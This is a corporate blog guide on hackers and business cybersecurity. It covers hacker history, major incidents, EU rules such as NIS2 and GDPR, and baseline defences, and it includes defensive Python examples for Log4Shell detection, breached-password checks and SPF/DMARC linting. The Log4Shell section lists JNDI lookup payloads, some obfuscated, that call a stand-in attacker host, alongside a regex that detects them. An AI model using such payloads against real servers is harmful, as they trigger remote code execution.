Hackers and your company: from MIT in the '60s to the major incidents (Stuxnet, WannaCry, SolarWinds, Colonial Pipeline) and the regulatory reality of 2026
Hackers and cybersecurity for businesses explained with the depth they deserve: the origin of the term at MIT's Tech Model Railroad Club (1960s), the distinction between black hat / white hat / gray hat, the major documented incidents (Stuxnet 2010, WannaCry 2017, SolarWinds 2020, Colonial Pipeline 2021, Change Healthcare 2024), the EU regulatory framework (NIS2, GDPR), and the basic measures that reduce 80% of the risk.
The team behind Polimake. We explore the intersection of technology, creativity, and automation.
The word hacker is one of the most loaded and most misunderstood terms in contemporary tech vocabulary. To the general public, it's associated with criminals who break into systems to steal money or information. To many in the tech industry, it still refers to its original meaning — someone with deep technical knowledge who explores and modifies systems, not necessarily with malicious intent.
For a company, the practical consequences don't depend on etymology but on operational reality: cyberattacks are common, costly, and growing, and the decision of how much to invest in cybersecurity is one that affects operational viability, regulatory compliance, and reputation. This guide covers the historical context (because it informs the present), the major documented incidents (because they teach patterns), the European regulatory framework of 2026 (because it defines obligations), and the basic measures that genuinely reduce risk.
The origin of the term: MIT, the Tech Model Railroad Club, 1960s
The word "hacker" in its modern technical sense was coined at MIT's Tech Model Railroad Club (TMRC) in the late 1950s and early 1960s. The TMRC was a student club that built elaborate model train layouts with sophisticated electromechanical systems. Members of the Signals and Power subclub —which handled the electronics of the layouts— used "hack" to describe a creative technical job or intervention, especially one that achieved something notable through elegant or unconventional means.
When those same students began to get access to MIT's first interactive computers (the TX-0, a Lincoln Laboratory machine on loan to MIT from 1958, and the PDP-1 from 1961), they carried the term into the new context. "Hacker" came to designate someone who mastered these systems at a deep level, explored their capabilities, and extended them with technical creativity.
Steven Levy documented this culture in his book Hackers: Heroes of the Computer Revolution (1984), where he formalized the original "hacker ethic": information should be free, authority should be distrusted, hackers are judged by their hacks and not by their formal credentials, you can create art and beauty with a computer, computers can change your life for the better.
This culture is in the DNA of organizations like the Free Software Foundation (Richard Stallman, 1985), Linux (Linus Torvalds, 1991), Apache (1995), Wikipedia, and open source communities in general. When people talk about "Apple" in its origins (Wozniak and Jobs building computers in a garage), about Silicon Valley culture, about the radical decisions of the internet — all of it derives from the original hacker culture.
The pejorative sense of the term —hacker as cybercriminal— became popular in the media from the mid-'80s with cases like Kevin Mitnick (arrested in 1995), although the technical community itself has, with mixed success, tried ever since to maintain the distinction between the original hacker (constructive) and the cracker (destructive). In 2026, the popular use of the term has clearly settled on the information-security meaning, although the original sense persists in technical circles.
The operational distinction: black hat, white hat, gray hat
To understand the real actors in the cybersecurity ecosystem, the industry uses a taxonomy that became popular around the '90s:
Black hat hackers. The criminals. They attack systems for their own benefit (theft, ransomware, espionage, sabotage) or for ideological reasons ("hacktivism"). They operate illegally. They span a spectrum from amateur individuals to sophisticated criminal organizations and state actors (APTs — Advanced Persistent Threats).
White hat hackers. Security professionals who use the same skills to defend. Pentesters (penetration testers) whom companies hire to identify vulnerabilities before the black hats do. Bug bounty hunters who report vulnerabilities to companies in exchange for a reward, usually through platforms such as HackerOne or Bugcrowd. Academic security researchers.
Gray hat hackers. In between. They may find vulnerabilities without explicit permission and report them to the affected company (sometimes with an expectation of payment, sometimes not). The line between legal and illegal is blurry because accessing systems without permission is typically a crime even when the intent is to notify.
Other relevant terms:
Script kiddies. Attackers with little technical skill who use tools and exploit kits made by others. Much of the background noise of automated scanning and opportunistic attacks that every internet-facing system sees comes from this group, which is why an unpatched service is found within hours of going online regardless of who owns it.
APT (Advanced Persistent Threat). An organized group with significant resources that carries out complex, long-term operations. They usually have state backing (Chinese APTs like APT1, Russian ones like Fancy Bear / APT28, North Korean ones like Lazarus). They attack specific organizations with strategic objectives.
Hacktivists. They attack for political or ideological reasons. Anonymous is a historical example. In 2026, groups like Killnet and NoName057(16) are examples tied to geopolitical conflicts.
Insider threats. The attacker is internal — a disgruntled employee, a contractor, a former employee with access that wasn't revoked. Statistically, a significant proportion of serious incidents involve insider threats.
The major incidents worth knowing
Knowing documented cases helps you understand what can happen and make informed investment decisions:
Stuxnet (discovered 2010). Widely considered the first cyberweapon used in a real operation: a sophisticated worm, attributed to a collaboration between the United States and Israel, designed specifically to sabotage the Iranian nuclear program. It spread through Windows (including via USB drives, so it could reach networks with no internet connection) and modified the code of the Siemens S7 PLCs controlling uranium-enrichment centrifuges at Natanz so that they damaged themselves while reporting normal readings to the operators. It's the paradigmatic example of how cyberattacks can have consequences in the physical world. Its discovery by the Belarusian firm VirusBlokAda in June 2010 changed the industrial perception of critical-infrastructure cybersecurity.
Sony Pictures (November 2014). Attackers (attributed to North Korea / the Lazarus Group) accessed and leaked internal emails, salaries, unreleased films, and employee data. The official motivation: punishment for the film "The Interview" about Kim Jong-un. It demonstrated that even large companies with resources could be significantly compromised. Sony temporarily pulled the film before releasing it with limited distribution.
WannaCry (May 2017). A ransomware worm that infected more than 200,000 computers in 150 countries within days. It spread using EternalBlue, an exploit for a Windows SMBv1 vulnerability developed by the US NSA and leaked by The Shadow Brokers in April 2017; Microsoft had published the patch (MS17-010) in March, two months before the outbreak, so the victims were overwhelmingly unpatched or end-of-life systems. It hit hospitals of the UK's NHS, paralyzing them, as well as Renault factories, Telefónica, FedEx, and thousands of organizations. The spread was largely stopped when Marcus Hutchins (a 22-year-old British researcher) registered an unregistered domain that the malware checked before running, which turned out to be a kill switch. Attributed to North Korea.
NotPetya (June 2017). Apparently ransomware, but really a wiper (permanent destruction). It dramatically affected Maersk (which had to rebuild 4,000 servers and 45,000 PCs in 10 days), Mondelez, FedEx, Merck, and Saint-Gobain. Estimated damages: more than 10 billion dollars. It originated in compromised Ukrainian accounting software. Attributed to Russian military intelligence (GRU).
Equifax (2017). Attackers were inside from May to July 2017 through an unpatched Apache Struts vulnerability for which a fix had been available since March; the company disclosed the breach in September. It exposed the personal data of 147.9 million people in the US (including Social Security numbers). The CEO resigned. The company agreed to a settlement of up to 700 million dollars with the FTC, the CFPB and the US states. A paradigmatic case of how a known vulnerability with an available patch can collapse corporate reputation.
SolarWinds / Sunburst (discovered December 2020). A supply-chain compromise: attackers (attributed to APT29 / Cozy Bear, associated with Russia's SVR) inserted a backdoor into the build process of SolarWinds Orion (network management software), so that legitimate, digitally signed updates carried it. The update was downloaded by approximately 18,000 customer organizations, including US federal agencies (Treasury, Commerce, DHS, NIH), Microsoft, Cisco, and Intel; the attackers then selected a much smaller set of those for follow-on intrusion. Because the malicious code carried the vendor's own signature, signature checks on the update gave no warning. It's an obligatory reference for how a compromised vendor can be a vector for attacking its entire customer base.
Colonial Pipeline (May 2021). Ransomware (attributed to the DarkSide group) that led the company to shut down the main fuel pipeline on the US East Coast. The initial access was mundane: a VPN account that was no longer in use but had never been disabled, protected by a password only (no MFA) that had appeared in a leaked credential dump. The company paid 4.4 million dollars in bitcoin as ransom (the FBI later recovered a large part of it). The incident triggered fuel shortages and panic buying. It demonstrated the concrete risk to critical infrastructure, and that the entry point is often a forgotten account rather than an exotic exploit.
Log4Shell / Log4j (December 2021). A critical vulnerability (CVE-2021-44228) in Log4j 2, a Java logging library used in hundreds of thousands of applications. Any attacker-controlled string that reached a log statement, a User-Agent header for example, could carry a lookup of the form ${jndi:ldap://attacker-host/x} (illustrative, not a real address) that made the server fetch and execute remote code. The initial disclosure created worldwide panic because the library was ubiquitous and exploitation was trivial; companies spent entire nights first finding out where they even had Log4j (often several layers deep inside vendor products) and then patching. It demonstrated the fragility of the open source software chain that modern systems depend on.
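The reason Log4Shell was so hard to filter at the perimeter is that Log4j resolved nested lookups before evaluating them, so attackers hid the string behind wrappers like ${lower:j} or ${::-j}. The following is an added example (not code from the original article) that normalizes the two most common evasions and then searches for the JNDI pattern; the log lines are constructed for the demonstration and the attacker hostnames are placeholders. It only handles the two wrapper forms shown; real detection belongs in the WAF or SIEM rules, and the real fix is patching.

```python
import re

# Log4j 2 evaluated nested lookups before acting on them, so "${jndi:" could be
# assembled from pieces at runtime. Resolve the two evasions attackers used most:
#   ${lower:X} / ${upper:X}  -> X in lower/upper case
#   ${anything:-X}           -> default-value syntax, evaluates to X
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(s: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups until nothing changes (bounded to avoid loops)."""
    for _ in range(max_rounds):
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            s,
        )
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def looks_like_log4shell(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None


# Constructed access-log lines (not real traffic); hostnames are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/x}"',
    '10.0.0.7 - - "GET /?q=${env:HOME} HTTP/1.1" 404 "-"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        flag = "ALERT" if looks_like_log4shell(line) else "ok   "
        print(flag, line)
```

A naive grep for the literal `${jndi:` would flag only the second line; the third and fourth are the forms that actually circulated in the first days.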
Lapsus$ (2022). A young group (some members were minors) that compromised Nvidia, Samsung, Microsoft, Okta, and T-Mobile, among others, through a combination of phishing, social engineering, and the purchase of credentials. It demonstrated that attacks with little technical sophistication can succeed if the victim's security culture is poor.
MOVEit Transfer (May-June 2023). A zero-day SQL injection vulnerability (CVE-2023-34362) in the MOVEit Transfer file-transfer product, exploited en masse by the Cl0p group to steal data. More than 2,700 organizations were affected, with the data of approximately 95 million people exposed. Many victims never ran MOVEit themselves: British Airways, the BBC and Aer Lingus were hit through their payroll provider Zellis, while Shell and numerous government agencies were hit directly. Another case of third-party risk: a vendor's software, and a vendor's vendor, is part of your attack surface.
Change Healthcare (February 2024). A subsidiary of UnitedHealth Group that processes a large share of the claims and payments in the US healthcare system. Ransomware (attributed to ALPHV/BlackCat) paralyzed medical payments for weeks. According to the CEO's testimony to Congress, the attackers got in with stolen credentials on a Citrix remote-access portal that had no MFA enabled. UnitedHealth paid 22 million dollars in ransom. The company initially estimated that the data of approximately 100 million people was compromised and later raised the figure to about 190 million. Total costs were estimated in the billions of dollars considering the impact on the entire healthcare system.
CrowdStrike incident (July 2024). Not an attack but a faulty content update to the Falcon endpoint sensor that crashed about 8.5 million Windows devices worldwide (Microsoft's figure), including airlines, hospitals, and financial systems; insurers' estimates of the losses ran into billions of dollars. It illustrates how dependence on a single vendor, especially one whose software runs with kernel-level privileges on every machine, creates systemic risk even without malicious actors.
This list is not exhaustive, but the incidents cited are the ones that have defined how enterprise cybersecurity has been thought about over the past 15 years.
The most common types of attacks in 2026
Beyond the high-profile incidents, the threats that mid-sized companies face on a daily basis:
Phishing. The most common initial attack vector. Fraudulent emails that look legitimate, used to extract credentials or install malware. Variants: spear phishing (targeted at a specific person), whaling (targeted at executives), vishing (by phone), smishing (by SMS), and business email compromise (BEC), which typically involves someone impersonating the CEO or a supplier to request an urgent transfer or a change of bank details (the victim is usually the CFO or the finance department).
Ransomware. Encryption of data with a ransom demand. A sophisticated business model in 2026 with organized groups, "ransomware-as-a-service" (RaaS) where operators rent infrastructure to "affiliates" who carry out the attacks. Typical payments range from hundreds of thousands to millions depending on the size of the victim.
Credential stuffing. Trying username and password pairs leaked from other breaches against your systems, automatically and at scale. It works because people reuse passwords; services like Have I Been Pwned index billions of credentials from known breaches, and attackers work from the same data.
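The useful defensive counterpart is to refuse passwords that already appear in known breaches, and the Pwned Passwords service lets you do that without ever sending the password: you send only the first five hex characters of its SHA-1 and match the rest locally. The block below is an added example (not code from the original article) of that k-anonymity check. It runs offline against a constructed copy of a range response in which only the SHA-1 of the string "password" is real; the other suffixes are made up, and `fake_fetch` stands in for the HTTPS request to the real endpoint.

```python
import hashlib

# Constructed sample of what the Pwned Passwords "range" endpoint returns for
# the prefix 5BAA6: one "SUFFIX:COUNT" line per known hash sharing that prefix.
# Only the third line (SHA-1 of "password") is a real hash; the rest are filler.
SAMPLE_RANGE_RESPONSE = """\
0123456789ABCDEF0123456789ABCDEF012:2
FEDCBA9876543210FEDCBA9876543210FED:5
1E4C9B93F3F0682250B6CF8331B7EE68FD8:10434004
00000000000000000000000000000000000:1
"""


def split_hash(password: str) -> tuple:
    """SHA-1 the password (the hash HIBP uses) and split it into the 5-char
    prefix that is sent to the service and the 35-char suffix that never is."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def parse_range(body: str) -> dict:
    """Turn the 'SUFFIX:COUNT' lines of a range response into a dict."""
    counts = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def breach_count(password: str, fetch_range) -> int:
    """How many times the password appears in known breaches (0 = not seen).

    fetch_range(prefix) must return the text body of GET
    https://api.pwnedpasswords.com/range/<prefix>; only the prefix leaves the host.
    """
    prefix, suffix = split_hash(password)
    return parse_range(fetch_range(prefix)).get(suffix, 0)


def fake_fetch(prefix: str) -> str:
    # Offline stand-in for the HTTPS call; returns the constructed sample above.
    return SAMPLE_RANGE_RESPONSE if prefix == "5BAA6" else ""


if __name__ == "__main__":
    for pw in ["password", "correct horse battery staple"]:
        n = breach_count(pw, fake_fetch)
        print(f"{pw!r}: {'seen ' + str(n) + ' times' if n else 'not in sample'}")
```

In production, `fetch_range` is a plain HTTPS GET of that URL (sending the `Add-Padding: true` header hides the response size); a password with a non-zero count should be rejected at signup and at password change, and existing users whose password matches should be forced to rotate on next login.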
Supply chain attacks. Compromising a vendor to reach its customers. SolarWinds and MOVEit are paradigmatic examples. Increasingly relevant as companies depend on more external services.
Zero-day exploits. Vulnerabilities unknown to the vendor. Sophisticated attackers use them before patches exist.
DDoS (Distributed Denial of Service). Flooding servers with massive traffic to make them inaccessible. Less sophisticated, but it can cause significant losses for sites that depend on continuous operation.
Insider threats. Malicious or careless employees. The acts aren't always malicious — an employee who sends sensitive data out by mistake can cause the same damage as a malicious one.
Social engineering. Manipulating people into revealing information or taking actions. The most common technique attackers use, more so than technical exploits. Kevin Mitnick, who became a security consultant after his release, wrote entire books on social engineering techniques (The Art of Deception, 2002).
Cryptojacking. Compromising systems to mine cryptocurrencies. Less visible than ransomware but costly (electricity consumption, system degradation).
API attacks. As companies expose more and more APIs, vulnerabilities in APIs (poor authentication, lack of rate limiting, data exposure) have become a significant attack vector.
AI-assisted phishing and deepfakes. In 2026, sophisticated attacks use generative AI to create emails, audio, and even video that are hard to distinguish from legitimate communications. There are documented cases of a cloned executive's voice or a deepfake video call being used to request a transfer. The defence is procedural (a second channel and a second approver for any payment or change of bank details), not a better eye for fakes.
The European regulatory framework in 2026
For companies operating in the European market, the regulatory obligations related to cybersecurity are significant:
GDPR (Regulation (EU) 2016/679). In force since May 2018. It establishes the protection of personal data with fines of up to €20 million or 4% of global annual turnover, whichever is higher. Personal-data breaches must be notified to the supervisory authority within 72 hours of becoming aware of them, and to the affected individuals when the risk to them is high. Cases of significant fines: Meta fined €1.2 billion in May 2023 for data transfers to the US; Amazon €746 million in 2021; Instagram (Meta) €405 million in 2022.
NIS2 Directive (Directive (EU) 2022/2555). Successor to the original NIS Directive of 2016. Member states had to transpose it by 17 October 2024 and apply it from 18 October 2024; many missed the deadline, so the obligations that actually bind you are those of your national transposition law. It dramatically expands the scope of cybersecurity regulation, with specific obligations for "essential entities" and "important entities" in 18 sectors including energy, transport, healthcare, water, digital infrastructure, manufacturing, food, waste management, postal services, and space. The obligations include minimum technical and organizational measures, incident reporting (an early warning within 24 hours of becoming aware of a significant incident), supply-chain cybersecurity, and mandatory training for management bodies, which can be held personally liable. Fines of up to €10 million or 2% of global annual turnover for essential entities, and up to €7 million or 1.4% for important entities. For many SMEs that were previously outside the scope of cybersecurity regulation, NIS2 now obligates them.
Cyber Resilience Act (Regulation (EU) 2024/2847). Adopted in October 2024 and in force since 10 December 2024; the obligation to report actively exploited vulnerabilities applies from 11 September 2026 and the remaining obligations from 11 December 2027. It requires manufacturers of products with digital elements (hardware, software) to meet cybersecurity requirements throughout the product's entire life cycle, including security updates for the support period.
DORA (Digital Operational Resilience Act, Regulation (EU) 2022/2554). Specific to the financial sector. Applicable since January 2025. It requires financial entities to have robust ICT risk management processes, resilience testing, and management of third-party providers.
Schrems II and international transfers. The CJEU ruling of July 2020 (Schrems II) invalidated the EU-US Privacy Shield and significantly raised the requirements for transferring personal data outside the EU. The EU-US Data Privacy Framework of July 2023 partially restored the framework, but it remains the subject of litigation.
In Spain specifically: the AEPD (Spanish Data Protection Agency) has an active history of investigation and sanction. AEPD fines number in the hundreds per year, many of them against Spanish companies. INCIBE (the National Cybersecurity Institute) offers free services to companies, especially SMEs, which are worth taking advantage of.
The measures that reduce 80% of the risk
Regardless of company size, there are basic measures that dramatically reduce risk. Implementing all of them is not optional in 2026:
Two-factor authentication (2FA / MFA) on everything. The single most impactful change: with it enabled, a leaked or phished password is no longer sufficient on its own. Especially critical for corporate email, financial systems, remote access (VPN, remote desktop) and admin panels. Prefer phishing-resistant methods (FIDO2 security keys, passkeys) over SMS codes or simple push notifications, which attackers can intercept or social-engineer their way past. And apply it to every external-facing login without exception: Colonial Pipeline and Change Healthcare were both entered through the one remote-access account that lacked it.
A password manager. 1Password, Bitwarden, Dashlane. It enables unique, long passwords for each service. Password reuse is the origin of credential stuffing.
Regular, tested backups. Automatic backups, with at least one copy kept offline or immutable (ransomware operators deliberately look for and encrypt or delete every backup reachable from the compromised network), and periodic restore tests that confirm the data comes back and how long a full restore takes. Without a tested backup, ransomware can be fatal.
Timely updates (patches). Most exploits take advantage of known vulnerabilities with available patches. Unpatched systems are easy targets. Formal update-management processes reduce vulnerability windows.
The principle of least privilege. Each user and system has only the permissions it needs for its function. It reduces the damage when a user is compromised.
Immediate revocation of access on departure. Employees who leave should have all their access revoked that same day. Real cases: former employees with access months later who get in and cause deliberate damage.
Continuous team training. Phishing is the most common vector, and the human factor is the biggest vulnerability. Periodic phishing simulations, recurring training, a culture of "ask first." KnowBe4 and similar offer training platforms.
Basic email security. SPF, DKIM, and DMARC configured on the domain to reduce spoofing. Note that a DMARC record with p=none only generates reports; spoofed mail in your name is still delivered until the policy moves to quarantine or reject. Advanced email filters on top.
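Most domains that "have SPF and DMARC" are still spoofable because the records are permissive. The block below is an added example (not code from the original article) of a small linter for the two records; the domains and TXT records in it are constructed, and in real use you would fetch them with a DNS lookup of `example.com` and `_dmarc.example.com` instead of reading them from the dict.

```python
import re

# Constructed TXT records for two hypothetical domains (no DNS lookup is made).
RECORDS = {
    "weak.example": {
        "spf": "v=spf1 include:_spf.google.com +all",
        "dmarc": "v=DMARC1; p=none",
    },
    "strong.example": {
        "spf": "v=spf1 include:_spf.google.com -all",
        "dmarc": "v=DMARC1; p=reject; rua=mailto:dmarc@strong.example; adkim=s; aspf=s",
    },
}

# SPF terms that cost a DNS lookup (RFC 7208 allows at most 10 in total).
_LOOKUP_TERM = re.compile(r"^[+\-~?]?(include:|a\b|mx\b|ptr\b|exists:|redirect=)")


def lint_spf(record: str) -> list:
    """Return a list of weaknesses in an SPF record (empty = acceptable)."""
    findings = []
    if not record.startswith("v=spf1"):
        return ["not an SPF record"]
    terms = record.split()[1:]
    all_term = next((t for t in terms if t.endswith("all")), None)
    if all_term is None:
        findings.append("no 'all' mechanism: unlisted senders are treated as neutral")
    elif all_term in ("+all", "all"):
        findings.append("'+all' authorises every host on the internet to send as this domain")
    elif all_term == "?all":
        findings.append("'?all' is neutral: SPF provides no protection")
    elif all_term == "~all":
        findings.append("'~all' softfail: receivers may still deliver spoofed mail; move to '-all' once DMARC is at reject")
    lookups = sum(1 for t in terms if _LOOKUP_TERM.match(t))
    if lookups > 10:
        findings.append(f"{lookups} DNS-lookup terms: exceeds the RFC 7208 limit of 10, receivers will permerror")
    return findings


def lint_dmarc(record: str) -> list:
    """Return a list of weaknesses in a DMARC record (empty = acceptable)."""
    findings = []
    tags = dict(kv.strip().split("=", 1) for kv in record.split(";") if "=" in kv)
    if tags.get("v") != "DMARC1":
        return ["not a DMARC record"]
    policy = tags.get("p")
    if policy == "none":
        findings.append("p=none only monitors: spoofed mail is still delivered")
    elif policy not in ("quarantine", "reject"):
        findings.append(f"missing or invalid policy tag p={policy!r}")
    if "rua" not in tags:
        findings.append("no rua= address: aggregate reports are not collected, so you cannot see who is spoofing you")
    if tags.get("pct", "100") != "100":
        findings.append(f"pct={tags['pct']}: the policy is applied to only part of the mail")
    return findings


def lint_domain(name: str, records: dict) -> dict:
    rec = records[name]
    return {"spf": lint_spf(rec["spf"]), "dmarc": lint_dmarc(rec["dmarc"])}


if __name__ == "__main__":
    for domain in RECORDS:
        print(domain, lint_domain(domain, RECORDS))
```

DKIM is not linted here because its weakness is usually not in the record but in the signing: check that every service that sends mail in your name (CRM, ticketing, newsletter tool) signs with your domain, otherwise moving DMARC to reject will block your own legitimate mail.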
Endpoint protection. Modern antivirus (or rather EDR — Endpoint Detection and Response), not just '90s-style antivirus. CrowdStrike, SentinelOne, Microsoft Defender. It protects the team's devices individually.
Disk encryption on devices. BitLocker on Windows, FileVault on Mac. If a laptop is lost, the data is not accessible to whoever finds it.
An incident response plan. Documented, known, rehearsed. Who does what when an incident occurs. Without a plan, the first hours (which are critical) are lost in confusion.
Regular audit of access and permissions. Quarterly or semiannually. Review who has access to what, and remove unnecessary access.
Documented GDPR compliance. Procedures for managing personal data, a record of processing activities, a clear privacy policy, a legal basis for each processing operation.
Cybersecurity insurance. For companies with significant assets, specific coverage for incidents (ransom, recovery, damages). Pricing depends on the measures implemented.
These basic measures, all implemented correctly, probably reduce 80% of everyday risk. The advanced measures (red teaming, 24/7 SOC, threat intelligence) are additional investment for companies with a higher risk profile.
The reality of the cost of an incident
For a company wondering whether the investment in cybersecurity justifies the cost, it's worth knowing the documented figures:
IBM publishes its Cost of a Data Breach Report annually, based on research with the Ponemon Institute. Some figures from the 2024 report:
- Average global cost of a data breach: 4.88 million dollars.
- In the healthcare sector: 9.77 million.
- In the financial sector: 6.08 million.
- Average time to identify a breach: 194 days; to contain it: 64 additional days (total ~258 days).
- Cost of a breach when identified in less than 200 days vs. more: a difference of 1.02 million dollars.
For Spanish SMEs, the costs are proportionally lower in absolute terms but comparable or greater in terms of impact on the business. Ransomware that paralyzes operations for a week can be fatal for small companies with tight cash flow.
Common security mistakes at mid-sized companies
"We're not big enough to be a target." False. Massive automated attacks don't discriminate by size. SMEs are attractive targets precisely because they have fewer defenses.
Buying tools without processes. A security tool without a process for using it doesn't protect you. Culture and discipline are as important as the software.
Sharing credentials over chat or email. A common practice in small companies. Any compromise of the account where they were shared exposes all the services.
Not revoking access when employees leave. Lists of employees with system access that are never audited are a source of incidents.
Underestimating vendor risk. If a vendor with access to your system is compromised, you can be too. Vendor auditing and contracts with security clauses.
Not documenting a response plan. When an incident occurs, the first hours are critical. Without a plan, they're lost.
Paying ransom without a protocol. Paying can be illegal in some jurisdictions (the US with OFAC sanctions). Without legal advice and cooperation with the authorities, a rushed decision can make the situation worse.
Relying only on the firewall. Perimeter defense is necessary but insufficient. Most modern attacks come from the inside (phishing, supply chain, insiders).
Not testing backups. Backups that exist but have never been tested may not work when they're needed. Testing restorations periodically is fundamental.
Ignoring training. An untrained team is the biggest vulnerability. Investment in training is among the most cost-effective in security.
Complying with GDPR only on paper. A published privacy policy that isn't followed internally. Incidents reveal the operational reality.
Hackers / cybersecurity and creative operations
For an agency or creative team, security considerations are specific but no less important:
Access to client files. Design/production teams handle raw files, editable files, and client data. Compromising these can mean severe reputational damage and a GDPR violation.
The client's social media accounts. If you manage social media for clients, their credentials live in your system. A compromise can take control of brands that aren't yours.
Collaboration platforms. Slack, Teams, Notion, Drive — where work in progress lives. Compromised access makes it possible to leak sensitive information.
Remote work with personal devices. Freelancers connecting to client systems from unprotected devices.
That coordination is the discipline of creative operations: approval workflows must include control over who accesses what, brand management must account for protecting assets, and operational processes must include the management of credentials, access, and devices.
At Polimake, that logic is built into the product: Studio and Media operate with access controls, robust authentication, and traceability of who accesses what. Security is not an optional feature but an operational requirement in the infrastructure of creative operations.
If you lead technology, operations, marketing, or any role with responsibility over data or systems, and you arrived here looking for an answer about hackers and your company, the most useful thing you can take from this article is probably the combination of three ideas: cyber risk is real, quantifiable, and growing (the documented incidents show replicable patterns), basic measures drastically reduce risk without requiring enormous investment (2FA, tested backups, updates, training, the principle of least privilege), and the European regulatory framework of 2026 (NIS2, GDPR) has made security investment less optional than ever with fines that can be existential for mid-sized companies. Cybersecurity went from "an IT topic" to "a management topic" a decade ago; ignoring that shift in 2026 is a negligent decision.
To round this out, bots and exploits on social media covers specific threats on social networks, consumerism covers the consumer-protection legal framework that intersects with privacy, and SaaS covers the services whose proper use significantly affects your security posture.
Quick references
- Bots and exploits on social media — specific threats on social platforms.
- Consumerism — the related consumer-protection legal framework.
- SaaS — the services whose configuration affects security.
- The cloud — the underlying infrastructure with its security particularities.
- Hosting (web host) — where the website lives and its security.